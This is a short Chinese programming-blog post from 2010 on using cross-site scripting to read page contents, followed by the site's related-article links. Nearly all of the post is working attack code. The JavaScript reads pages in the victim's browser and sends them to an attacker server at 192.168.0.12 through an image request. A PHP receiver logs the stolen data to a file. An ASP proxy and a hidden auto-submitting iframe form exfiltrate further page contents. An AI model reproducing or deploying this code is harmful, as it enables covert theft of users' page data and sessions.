xss文件页面内容读取(解决)


Posted in Javascript onNovember 28, 2010

js:

document.body.addBehavior("#default#Download"); 
var mycars = new Array(); 
mycars[0] = "l.htm"; 
mycars[1] = "y.htm"; 
for (x in mycars ) 
{ 
if(document.body.startDownload(mycars[x],GetData)){ 
GetData(source); 
} 
} function GetData(source) 
{ 
txt=escape(source); 
getReaded(txt); 
} 
function getReaded(usr) { 
var newimg = new Image(); 
newimg.src="http://192.168.0.12/style.php?key="+"\n"+"\n"+usr+"\n"+"\n"; 
}

php:

<?php 
header('Content-Type:text/html;charset=GB2312'); 
function unescape($str) { 
$str = rawurldecode($str); 
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r); 
$ar = $r[0]; 
foreach($ar as $k=>$v) { 
if(substr($v,0,2) == "%u") 
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4))); 
elseif(substr($v,0,3) == "&#x") 
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1))); 
elseif(substr($v,0,2) == "&#") { 
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1))); 
} 
} 
return join("",$ar); 
} 
$file="news.html"; 
$_GET['key']=unescape($_GET['key']); 
fputs(fopen($file,'a+'),$_GET['key']); 
?>

=================================================以下通用了===============
<% 
Response.Buffer = True 
Dim sUrlB,send(2) 
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm")) 
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm")) 
function PageWebProxy(xmlpath) 
Dim i, re, Url, Html 
Url = xmlpath Set re = New RegExp 
re.IgnoreCase = True 
re.Global = True 
sUrlB = Url 
Html = getHTTPPage(Url) 
Url = Left(Url, InStrRev(Url, "/")) 
i = InStr(sUrlB, "?") 
If i > 0 Then 
sUrlB = Left(sUrlB, i - 1) 
End If 
re.Pattern = "(href|action)=(\'|"")?(\?)" 
Html = re.Replace(Html,"$1=$2" & sUrlB & "?") 
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1x=$2$3$2") 
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1x($2$3$2)") 
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2" & Url & "$3$2") 
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2") 
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2") 
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2" & Url & "$3$2)") 
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)") 
Html = Replace(Html, "&", "%26") 
If Split(Url, "/")(2) = "club.isso.com.cn" Then 
Html = Replace(Html, "%26amp;", "%26") 
Else 
Html = Replace(Html, "%26amp;", "&") 
End If 
Html = Replace(Html, "%26nbsp;", " ") 
Html = Replace(Html, "%26lt;", "<") 
Html = Replace(Html, "%26gt;", ">") 
Html = Replace(Html, "%26quot;", """) 
Html = Replace(Html, "%26copy;", "©") 
Html = Replace(Html, "%26reg;", "®") 
Html = Replace(Html, "%26raquo;", "»") 
Html = Replace(Html, "%26%26", "&&") 
Html = Replace(Html, "%26#", "&#") 
' Html = Replace(Html, "%26", "") 
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2$3$2") 
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))" 
Html = re.Replace(Html,"?url=$1") 
re.Pattern = "\?url=" & Url & "(#|javascript:)" 
Html = re.Replace(Html,"$1") 
re.Pattern = "multipart\/form-data" 
Html = re.Replace(Html,"") 
PageWebProxy=Html 
End function 
Function getHTTPPage(url) 
Dim Http, theStr, fileExt 
Set Http = Server.CreateObject("MSXML2.XMLHTTP") 
If Request.Form.Count > 0 Then 
For Each x In Request.Form 
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&" 
Next 
Http.Open "POST", url, False 
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded" 
Http.Send(theStr) 
Else 
Http.Open "GET", url, False 
Http.Send() 
End If 
If Http.readystate<>4 then Exit Function 
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1)) 
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then 
Response.Clear 
Response.BinaryWrite Http.responseBody 
Response.End() 
Else 
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then 
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1) 
Response.BinaryWrite Http.responseBody 
Response.Flush 
Else 
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312") 
End If 
End If 
Set Http = Nothing 
End Function 
Function BytesToBstr(body,Cset) 
Dim objstream 
Set objstream = Server.CreateObject("adodb.stream") 
objstream.Type = 1 
objstream.Mode =3 
objstream.Open 
objstream.Write body 
objstream.Position = 0 
objstream.Type = 2 
objstream.Charset = Cset 
BytesToBstr = objstream.ReadText 
objstream.Close 
Set objstream = nothing 
End Function 
%> 
document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>") 
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>"); 
document.writeln("<input id=var name=var type=hidden>"); 
document.writeln("<input id=vartwo name=vartwo type=hidden>"); 
document.writeln("<input type=submit style=display:none>"); 
document.writeln("<\/form>") 
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>'); 
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>'); 
document.getElementById("form").submit();
Javascript 相关文章推荐
javascript实现动态CSS换肤技术的脚本
Jun 29 Javascript
javascript工厂方式定义对象
Dec 26 Javascript
JS动态修改iframe高度和宽度的方法
Apr 01 Javascript
JS中对象与字符串的互相转换详解
May 20 Javascript
jQuery+CSS3实现四种应用广泛的导航条制作实例详解
Sep 17 Javascript
基于VUE选择上传图片并页面显示(图片可删除)
May 25 Javascript
Vue父子模版传值及组件传值的三种方法
Nov 27 Javascript
深入理解JS中Number(),parseInt(),parseFloat()三者比较
Aug 24 Javascript
Vue结合后台导入导出Excel问题详解
Feb 19 Javascript
微信小程序数据统计和错误统计的实现方法
Jun 26 Javascript
解决Vue router-link绑定事件不生效的问题
Jul 22 Javascript
Vue通过Blob对象实现导出Excel功能示例代码
Jul 31 Javascript
用js来解决ajax读取页面乱码
Nov 28 #Javascript
window.name代替cookie的实现代码
Nov 28 #Javascript
在一个js文件里远程调用jquery.js会在ie8下的一个奇怪问题
Nov 28 #Javascript
一个网马的tips实现分析
Nov 28 #Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
You might like
香妃
2021/03/03 冲泡冲煮
PHP导出MySQL数据到Excel文件(fputcsv)
2011/07/03 PHP
非常精妙的PHP递归调用与静态变量使用
2012/12/16 PHP
curl不使用文件存取cookie php使用curl获取cookie示例
2014/01/26 PHP
轻松掌握php设计模式之访问者模式
2016/09/23 PHP
Thinkphp结合ajaxFileUpload实现异步图片传输示例
2017/03/13 PHP
Thinkphp5 微信公众号token验证不成功的原因及解决方法
2017/11/12 PHP
PHP获取ttf格式文件字体名的方法示例
2019/03/06 PHP
asp.net+js 实现无刷新上传解析csv文件的代码
2010/05/17 Javascript
JavaScript中window、doucment、body的解释
2013/08/14 Javascript
JS动态加载脚本并执行回调操作
2016/08/24 Javascript
使用BootStrap进行轮播图的制作
2017/01/06 Javascript
jquery中关于bind()方法的使用技巧分享
2017/03/30 jQuery
jQuery Plupload上传插件的使用
2017/04/19 jQuery
View.post() 不靠谱的地方你知道多少
2017/08/29 Javascript
jQuery实现为动态添加的元素绑定事件实例分析
2018/09/07 jQuery
[36:19]2018DOTA2亚洲邀请赛 小组赛 A组加赛 Newbee vs LGD
2018/04/03 DOTA
[40:19]完美世界DOTA2联赛PWL S3 Rebirth vs CPG 第二场 12.18
2020/12/19 DOTA
[01:02:38]DOTA2-DPC中国联赛定级赛 LBZS vs Phoenix BO3第二场 1月10日
2021/03/11 DOTA
python函数装饰器用法实例详解
2015/06/04 Python
Python实现随机生成有效手机号码及身份证功能示例
2017/06/05 Python
Python Excel处理库openpyxl使用详解
2019/05/09 Python
python-Web-flask-视图内容和模板知识点西宁街
2019/08/23 Python
python飞机大战pygame游戏背景设计详解
2019/12/17 Python
Python3常见函数range()用法详解
2019/12/30 Python
pycharm无法安装第三方库的问题及解决方法以scrapy为例(图解)
2020/05/09 Python
python 通过文件夹导入包的操作
2020/06/01 Python
Python实现爬取并分析电商评论
2020/06/19 Python
CSS3实现同时执行倾斜和旋转的动画效果
2016/10/27 HTML / CSS
美国中西部家用医疗设备商店:Med Mart(轮椅、踏板车、升降机等)
2019/04/26 全球购物
德国拖鞋网站:German Slippers
2019/11/08 全球购物
学生个人自我鉴定范文
2014/03/28 职场文书
给老婆的保证书范文
2014/04/28 职场文书
党员个人对照检查材料
2014/10/01 职场文书
数学教师求职信范文
2015/03/20 职场文书
航班延误投诉信
2015/07/02 职场文书